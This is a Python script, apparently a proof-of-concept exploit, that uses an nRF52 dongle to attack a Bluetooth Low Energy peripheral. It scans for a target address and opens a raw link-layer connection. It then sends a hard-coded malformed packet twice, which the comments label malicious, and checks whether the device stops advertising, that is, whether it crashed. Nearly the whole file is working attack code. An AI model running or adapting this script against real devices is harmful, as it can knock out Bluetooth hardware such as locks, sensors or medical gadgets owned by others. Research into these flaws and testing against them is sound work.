#!/usr/bin/python 
import sys
import os
import platform
from time import sleep
from threading import Timer
# libs
sys.path.insert(0,os.getcwd() + '/libs')
import serial
import colorama
from colorama import Fore
from drivers.NRF52_dongle import NRF52Dongle
from scapy.layers.bluetooth4LE import *
from scapy.layers.bluetooth import *
from scapy.utils import wrpcap
# timeout lib
from timeout_lib import start_timeout, disable_timeout, update_timeout

# Default master address
master_address = '5d:36:ac:90:0b:22'
access_address = 0x9a328370
# Internal vars
none_count = 0
end_connection = False
connecting = False

# Autoreset colors
colorama.init(autoreset=True)

# Get serial port from command line
if len(sys.argv) >= 2:
	serial_port = sys.argv[1]
elif platform.system() == 'Linux':
	serial_port = '/dev/ttyACM0'
elif platform.system() == 'Windows':
	serial_port = 'COM1'
else:
	print(Fore.RED + 'Platform not identified')
	sys.exit(0)

print(Fore.YELLOW + 'Serial port: ' + serial_port)

# Get advertiser_address from command line (peripheral addr)
if len(sys.argv) >= 3:
	advertiser_address = sys.argv[2].lower()
else:
	advertiser_address = 'A4:C1:38:D8:AD:A9'

print(Fore.YELLOW + 'Advertiser Address: ' + advertiser_address.upper())

def crash_timeout():
	print(Fore.RED + "No advertisement from " + advertiser_address.upper() + 
		' received\nThe device may have crashed!!!')
	disable_timeout('scan_timeout')

def scan_timeout():
	connecting = False
	scan_req = BTLE() / BTLE_ADV() / BTLE_SCAN_REQ(
			ScanA=master_address,
			AdvA=advertiser_address)
	driver.send(scan_req)
	start_timeout('scan_timeout', 2, scan_timeout)


# Open serial port of NRF52 Dongle
driver = NRF52Dongle(serial_port, '115200')
# Send scan request
scan_req = BTLE() / BTLE_ADV() / BTLE_SCAN_REQ(
            ScanA=master_address,
            AdvA=advertiser_address)
driver.send(scan_req)

start_timeout('scan_timeout', 2, scan_timeout)

print(Fore.YELLOW + 'Waiting advertisements from ' + advertiser_address)
while True:
	pkt = None
	# Receive packet from the NRF52 Dongle
	data = driver.raw_receive()
	if data:
		# Decode Bluetooth Low Energy Data
		pkt = BTLE(data)
		# if packet is incorrectly decoded, you may not be using the dongle
		if pkt is None:
			none_count += 1
			if none_count >= 4:
				print(Fore.RED + 'NRF52 Dongle not detected')
				sys.exit(0)
			continue
		elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt:
			update_timeout('scan_timeout')
			# Print slave data channel PDUs summary
			print(Fore.MAGENTA + "Slave RX <--- " + pkt.summary()[7:])
		# --------------- Process Link Layer Packets here ------------------------------------
		# Check if packet from advertised is received
		if BTLE_SCAN_RSP in pkt and pkt.AdvA == advertiser_address.lower() and connecting == False:
			connecting = True
			update_timeout('scan_timeout')
			disable_timeout('crash_timeout')
			
			print(Fore.GREEN + advertiser_address.upper() + ': ' + pkt.summary()[7:] + ' Detected')
    		# Send connection request to advertiser
			conn_request = BTLE() / BTLE_ADV(RxAdd=pkt.TxAdd, TxAdd=0) / BTLE_CONNECT_REQ(
            InitA=master_address,
            AdvA=advertiser_address,
            AA=access_address, # Access address (any)
            crc_init=0x179a9c, # CRC init (any)
            win_size=2, # 2.5 of windows size (anchor connection window size)
            win_offset=1, # 1.25ms windows offset (anchor connection point)
            interval=16,  # 20ms connection interval
            latency=0, # Slave latency (any)
            timeout=50, # Supervision timeout, 500ms (any)
            chM=0x1FFFFFFFFF, # Any
            hop=5, # Hop increment (any)
            SCA=0, # Clock tolerance
        	)
			# Yes, we're sending raw link layer messages in Python. Don't tell Bluetooth SIG as this is forbidden by them!!!
			driver.send(conn_request)
		elif BTLE_DATA in pkt and connecting == True:
			connecting = False
			print(Fore.GREEN + 'Slave Connected (L2Cap channel established)')
			# Send version indication request
			pkt = BTLE(access_addr=access_address) / BTLE_DATA() / CtrlPDU() / LL_VERSION_IND(version='4.2')
			driver.send(pkt)

		elif LL_VERSION_IND in pkt:
			pkt = BTLE(access_addr=access_address) / BTLE_DATA() / CtrlPDU() / LL_LENGTH_REQ(
			max_tx_bytes=247 + 4, max_rx_bytes=247 + 4)
			driver.send(pkt)

		elif LL_LENGTH_RSP in pkt or LL_UNKNOWN_RSP in pkt:
			fragment = BTLE('7083329a0201070006000103000910070787b87c'.decode('hex'))
			driver.send(fragment) # Send the malicius packet (1/2)
			driver.send(fragment) # Send the malicius packet (2/2)
			end_connection = True

		elif end_connection == True:
			end_connection = False
			scan_req = BTLE() / BTLE_ADV() / BTLE_SCAN_REQ(
			ScanA=master_address,
			AdvA=advertiser_address)
			print(Fore.YELLOW + 'Connection reset, malformed packets were sent')
		
 			print(Fore.YELLOW + 'Waiting advertisements from ' + advertiser_address)
 			driver.send(scan_req)
 			start_timeout('crash_timeout', 7, crash_timeout)


	sleep(0.01)